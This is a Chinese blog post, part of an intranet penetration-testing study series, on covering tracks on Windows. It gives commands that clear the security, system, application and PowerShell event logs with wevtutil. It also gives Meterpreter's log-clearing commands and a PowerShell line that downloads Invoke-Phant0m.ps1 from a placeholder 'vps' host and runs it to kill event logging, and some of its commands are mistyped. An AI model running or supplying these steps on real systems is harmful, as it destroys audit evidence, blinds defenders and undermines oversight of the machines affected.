前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Windows痕迹清除|内网渗透学习(十三)

Windows痕迹清除|内网渗透学习(十三)

作者头像
h0cksr
发布2023-05-18 09:02:02
6760
发布2023-05-18 09:02:02
举报
文章被收录于专栏:h0cksr的小屋

Windows痕迹清除|内网渗透学习(十三)

在渗透测试过程中·Windows日志往往会记录系统上的敏感操作,如添加用户, 远程登录, 执行命令等, 攻击者通常会对Windows日志进行清除和绕过。

下面就是一些对日志的简单介绍和取出操作。

Windows日志

日志主要包括五个类别:

  1. 应用程序
  2. 安全
  3. Setup
  4. 系统
  5. 转发

日志文件均存放在C:\Windows\System32\winevt\Logs, 在文件夹中上图的各个选项分别有一个日志文件.evtx, 而Microft则是有多个日志文件

使用powershell查看所有应用程序的日志:

代码语言:javascript
复制
powershell.exe -c "Get-WinEvent -FilterHashtable @{logname='Application';}"

日志清理

最粗暴的方法应该就是直接删除C:\Windows\System32\winevt\Logs下面对应的日志文件了, 但是一般不会这么干

wevtutil.exe: 用于检索有关时间日志发布者的信息, 安装和卸载事件清单, 运行查询, 导出, 存档, 清除日志

代码语言:javascript
复制
wevtutil cl security    #清除安全日志
wevtutil cl system      #清除系统日志
wevtutil cl application #清除引用日志
wevyuyil cl "windows powershell"  #清除powershell日志

上面几个是比较需要关注的日志, 其他更多地可以参考下面这两个(没找到什么很好的资料)

https://zhuanlan.zhihu.com/p/27665584

https://www.cnblogs.com/xiaozi/p/13633934.html

meterpreter 清理日志

删除渗透过程中使用的工具

删除之前添加的账号:

执行CMD命令: net user admin /del

删除应用程序, 系统和安全日志:

代码语言:javascript
复制
clearrev

clearrev是meterpreter提供的命令

查看时间日志

代码语言:javascript
复制
run event_manager -i

删除事件日志

代码语言:javascript
复制
run event_manager -c

停止日志记录

利用脚本让日志功能失效, 无法记录日志

第一种方法就是通过powershell脚本工具直接将日志记录的进程给kill掉, 从而使得日志记录失效

代码语言:javascript
复制
powershell.exe "IEX(new-object system.net.webclient).downloading
String('http://vps/Invoke-Phant0m.ps1').Invoke-Phant0m"

https://github.com/hlldz/Phant0m/blob/master/old/Invoke-Phant0m.ps1

恢复日志记录功能

eventlog(有可能会不存在)对应的svchost进程结束, 重新开启Windows Event Log服务, 即可回复日志记功能

日志记录用户创建的过程

正常情况下, 当我们添加一个一个账户的时候, 在日志的security日志中会有建立用户过程的详细记录, 日志中记录的事件如下:

  1. 读取身份凭据判断是否为管理员
  2. 创建新用户
  3. 启用新用户
  4. 重置新用户账户密码

2022_10_02 14:30

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-10-02 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Windows痕迹清除|内网渗透学习(十三)
    • Windows日志
      • 日志清理
    • meterpreter 清理日志
      • 停止日志记录
      相关产品与服务
      网站渗透测试
      网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档